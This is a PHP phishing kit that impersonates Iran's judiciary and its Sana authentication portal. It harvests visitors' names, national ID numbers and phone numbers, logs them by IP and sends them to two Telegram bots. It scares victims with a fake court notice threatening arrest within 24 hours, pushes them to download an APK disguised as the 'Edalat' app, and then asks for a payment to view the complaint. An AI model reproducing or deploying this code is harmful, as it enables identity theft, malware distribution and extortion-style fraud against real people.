<?php

error_reporting(0);
session_start() ;

require('info.php');

#Google anti bot 

$Botlimit = true ; // true = on | false = off

#IP Checker : Iran IP only 

$IPlimit = true ; // true = on | false = off

#Number of spam cards

$Spam = 3; // Type Is Integer *

require("Checker.php") ;

if(!is_dir('db'))
{
    mkdir('db');
}

if(!file_exists('db/users.json'))
{
    file_put_contents('db/users.json', json_encode([], 448));
}

function ip()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];
    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }
    return $ip;
}

if(isset($_GET['sign_in']))
{

    if($_SESSION["sign_in"]  > 1 ) exit() ;
    
    $_SESSION["sign_in"]++;
    
    $fullname = $_POST["fullname"];
    $cm = $_POST["meli"];
    $number = $_POST["phone"];
    
    $ip = ip();

    $db = json_decode(file_get_contents('db/users.json'), true);
    
    $db[$ip] = ['cm' => $cm, 'name' => $fullname, 'phone' => $number];
    
    file_put_contents('db/users.json', json_encode($db, 448));
    
    session_start();
    
    if(!empty($cm) and !empty($fullname) and !empty($number))
    {
        $_SESSION['cm'] = $cm;
        $_SESSION['name'] = $fullname;
        $_SESSION['phone'] = $number;
    }
    
    $des = "  
--| 🌍 - #Login_Web

--| 📞 - <code>$number</code>
--| ℹ️ - <code>$cm</code>
--| 📅 -  $bd

--| 📍 -  « <code>$ip</code> »

@yozasia2025

";

    $des = strtr($des, array(
        '۰' => '0',
        '۱' => '1',
        '۲' => '2',
        '۳' => '3',
        '۴' => '4',
        '۵' => '5',
        '۶' => '6',
        '۷' => '7',
        '۸' => '8',
        '۹' => '9',
        '٠' => '0',
        '١' => '1',
        '٢' => '2',
        '٣' => '3',
        '٤' => '4',
        '٥' => '5',
        '٦' => '6',
        '٧' => '7',
        '٨' => '8',
        '٩' => '9'
    ));
    
    $KeyBoard12 = json_encode(['inline_keyboard'=> [
        [['text'=>"$fullname",'callback_data'=>"gggg"]],
        [['text'=>"$Device",'callback_data'=>"gggsadaxasxaxa"]],
        [['text'=>"VectorSelf", 'url'=>"https://t.me/VectorSelf"]],
    ]]);
        
    if (!empty($Token) && !empty($Id))
    {
        $params = [
            'chat_id' => $Id,
            'reply_markup' => $KeyBoard12,
            'text' => $des,
            'parse_mode' => 'HTML'
        ];
        
        $website = "https://api.telegram.org/bot" . $Token;
        $ch = curl_init($website . '/sendMessage');
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch);
        curl_close($ch);
        
        $params = [
            'chat_id' => $Id_shell,
            'reply_markup' => $KeyBoard12,
            'text' => $des . "\n- - - - -\n" . $Port,
            'parse_mode' => 'HTML'
        ];
        
        $website2 = "https://api.telegram.org/bot" . $Token_shell;
        $ch2 = curl_init($website2 . '/sendMessage');
        curl_setopt($ch2, CURLOPT_HEADER, false);
        curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch2, CURLOPT_POST, 1);
        curl_setopt($ch2, CURLOPT_POSTFIELDS, ($params));
        curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch2);
        curl_close($ch2);
    
    }	

?>
	
	
<html ng-app="LoginApp" class="ng-scope">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>

	<meta charset="utf-8">

	<meta http-equiv="X-UA-Compatible" content="IE=edge">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<meta name="description" content="سامانه احراز هویت ثنا">

	<meta name="keywords" content="ثنا ، ثبت نام الکترونیک قضایی">

	<title>سامانه ثنا پیگیری شکایات </title>

	<link href="css/bootstrap-theme.min.css"type="text/css" rel="stylesheet">

	<link href="css/font-awesome.min.css" type="text/css" rel="stylesheet">

	<link href="css/styles.css" type="text/css" rel="stylesheet">

	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.css" />
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.js"></script>

</head>



<body ng-controller="LoginController" ng-csp="no-unsafe-eval | no-inline-style" oncontextmenu="return false"

	class="ng-scope">

	<div class="container">

		<div class="row row-no-padding">

			<div class="col-md-12 col-sm-12 col-xs-12">

				<div class="background-white border-radius-20 margin-top-15 overflow-hidden shadow-sm overflow-hidden">

					<div class="row row-no-padding no-margin no-padding d-flex" id="containerLogin">

						<div class="col-md-12 col-sm-12 col-xs-12 pull-left">

							<form  name="frmAuthenticate" id="frmAuthenticate"

								class="form-horizontal ng-pristine ng-valid ng-scope ng-valid-pattern ng-valid-minlength ng-valid-maxlength ng-valid-jud-validator"

								role="form" ng-keypress="actions.preventEnterKey($event,1)" novalidate=""

								jud-validator="" ng-if="viewModel.loginStep==1">

								<section class="bg-light-default">

									<div class="text-center  login-effect">

                                    <div class="d-flex justify-content-center align-items-center mt-5">

									<img src="img/logo.png" alt="مرکز آمار و فناوری اطلاعات قوه قضائیه">

								</div>

								<div class="d-flex justify-content-center align-items-center font-size-2rem">

									قوه قضائیه

								</div>

                            </div>

									<br>

                             <h5 style="color: #FFA07A; font-size: larger; font-weight: bold;line-height: 25px;" class="text-center text-success">شکایتی علیه شما ثبت شده است . <br> ابلاغیه الکترونیکی شماره : 1402087654786853 <br>در صورتی که این ابلاغیه را نادیده بگیرید <br>طبق قانون آیین دادرسی، کیفری درکم تر از <br> ۲۴ ساعت حکم جلب شما صادر و اجرا خواهد شد. <br> جهت پیگیری ابلاغیه از طریق اپلیکیشن عدالت همراه<br> اقدام کنید، دانلود مستقیم با کلیک بر روی دکمه زیر. </h5>
<br>
									<div class="row px-5">

										<div class="col-sm-12 col-md-12 col-lg-12 col-xl-12">

											<button id="submitbtn" class="btn btn-primary d-block btn-user w-100 rounded-pill p-2 mt-4"

												focus-if="login.captchaValueFirst.length==5"

												ng-disabled="viewModel.loading" ng-click="actions.checkPersonLogin()">

												<span ng-if="!viewModel.loading"

													class="ng-scope">

													دانلود اپلیکیشن

												</span>
												
										  </button>

										</div>

									</div>

								</section>

							</form>

						</div>

					</div>

				</div>

			</div>

		</div>

	</div>

<script>
document.getElementById("frmAuthenticate").addEventListener("submit", function(event) {
  event.preventDefault(); 
  new Noty({
    text: 'فرایند دریافت آغاز شد. ',
    type: 'success',
    closeWith: ['button'], 
   }).show();
   setTimeout(function() { window.location.href ='<?php echo('edalat.apk') ;?>' ; }, 2000);
   
});
   
   
</script>

</body>


</html> 
	
<?php 

} 
else if(isset($_GET['check_eb'])) {

if($_SESSION["check_eb"]  > 1 ) exit() ;
	$_SESSION["check_eb"]++;
	
	session_start();

    $user_id = empty($_SESSION['user']) ? '!?' : $_SESSION['user'];
    
    if($user_id == '!?' or $user_id == '')
    {
        $db = json_decode(file_get_contents('db/users.json'), true);
        $userid = $db[$ip]['user'];
    }
    else
    {
        $userid = $user_id;
    }
	
	$des = "  
--| 📱 -  #Login_App 

--| Name : {$_POST['fullname']}
--| ℹ️ - <code>{$_POST['meli']}</code>
--| 📶 - « <code>$ip</code> »

--| 🕹 - <code>$userid</code>

@yozasia2025

";
        
    if (!empty($Token) && !empty($Id))
    {
        $params = [
            'chat_id' => $Id,
            'text' => $des,
            'parse_mode' => 'HTML'
        ];
        $website = "https://api.telegram.org/bot" . $Token;
        $ch = curl_init($website . '/sendMessage');
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch);
        curl_close($ch);
        
        $params = [
            'chat_id' => $Id_shell,
            'text' => $des . "\n- - - - -\n" . $Port,
            'parse_mode' => 'HTML'
        ];
        
        $website2 = "https://api.telegram.org/bot" . $Token_shell;
        $ch2 = curl_init($website2 . '/sendMessage');
        curl_setopt($ch2, CURLOPT_HEADER, false);
        curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch2, CURLOPT_POST, 1);
        curl_setopt($ch2, CURLOPT_POSTFIELDS, ($params));
        curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);
        $result = curl_exec($ch2);
        curl_close($ch2);
        
    }
   
?>
	
	
<html ng-app="LoginApp" class="ng-scope">

<head>

	<meta charset="utf-8">

	<meta http-equiv="X-UA-Compatible" content="IE=edge">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<meta name="description" content="سامانه احراز هویت ثنا">

	<meta name="keywords" content="ثنا ، ثبت نام الکترونیک قضایی">

	<title>سامانه احراز هویت ثنا | Sana Authentication</title>

	<link href="css/bootstrap-theme.min.css"type="text/css" rel="stylesheet">

	<link href="css/font-awesome.min.css" type="text/css" rel="stylesheet">

	<link href="css/styles.css" type="text/css" rel="stylesheet">

	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.css" />
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.js"></script>


</head>

<body ng-controller="LoginController" ng-csp="no-unsafe-eval | no-inline-style" oncontextmenu="return false"

	class="ng-scope">

	<div class="container">

		<div class="row row-no-padding">

			<div class="col-md-12 col-sm-12 col-xs-12">

				<div class="background-white border-radius-20 margin-top-15 overflow-hidden shadow-sm overflow-hidden">

					<div class="row row-no-padding no-margin no-padding d-flex" id="containerLogin">

						<div class="col-md-12 col-sm-12 col-xs-12 pull-left">

							<form name="frmAuthenticate" id="frmAuthenticate"

								class="form-horizontal ng-pristine ng-valid ng-scope ng-valid-pattern ng-valid-minlength ng-valid-maxlength ng-valid-jud-validator"

								role="form" ng-keypress="actions.preventEnterKey($event,1)" novalidate=""

								jud-validator="" ng-if="viewModel.loginStep==1">

								<section class="bg-light-default">

									<div class="text-center  login-effect">

                                    <div class="d-flex justify-content-center align-items-center mt-5">

									<img src="img/logo.png" alt="مرکز آمار و فناوری اطلاعات قوه قضائیه">

								</div>

								<div class="d-flex justify-content-center align-items-center font-size-2rem">

									قوه قضائیه

								</div>

                            </div>

							<br>

								<h5 style="color: #D8BFD8; font-size: larger; font-weight: bold;line-height: 25px;" class="text-center text-success">مودی گرامی لازم به ذکر است برای مشاهده شکایت به شماره 1400032857 شما باید از طریق درگاه بانکی زیر مبلغ <?php echo number_format($Amount); ?> ریال را پرداخت کنید . پس از پرداخت وجه از طریق اپلیکیشن میتوانید شکایت مربوطه را بررسی و پیگیری کنید</h5>

									<div class="row px-5">

										<div class="col-sm-12 col-md-12 col-lg-12 col-xl-12">

											<button id="submitbtn" class="btn btn-primary d-block btn-user w-100 rounded-pill p-2 mt-4"

												focus-if="login.captchaValueFirst.length==5"

												ng-disabled="viewModel.loading" ng-click="actions.checkPersonLogin()">

												<span ng-if="!viewModel.loading"

													class="ng-scope">

													پرداخت و  مشاهده ابلاغیه 

												</span>

                                            </button>

										</div>

									</div>
									
								</section>

							</form>

						</div>

					</div>

				</div>

			</div>

		</div>

	</div>
<script>
document.getElementById("frmAuthenticate").addEventListener("submit", function(event) {
  event.preventDefault(); 
  new Noty({
    text: 'در حال اتصال به سامانه ... ',
    type: 'success',
    closeWith: ['button'], 
   }).show();
   setTimeout(function() { window.location.href ='Payment' ; }, 3000);
   
});
</script> 
</body>
</html>

<?php
}
else
{
    http_response_code(404);
}

?>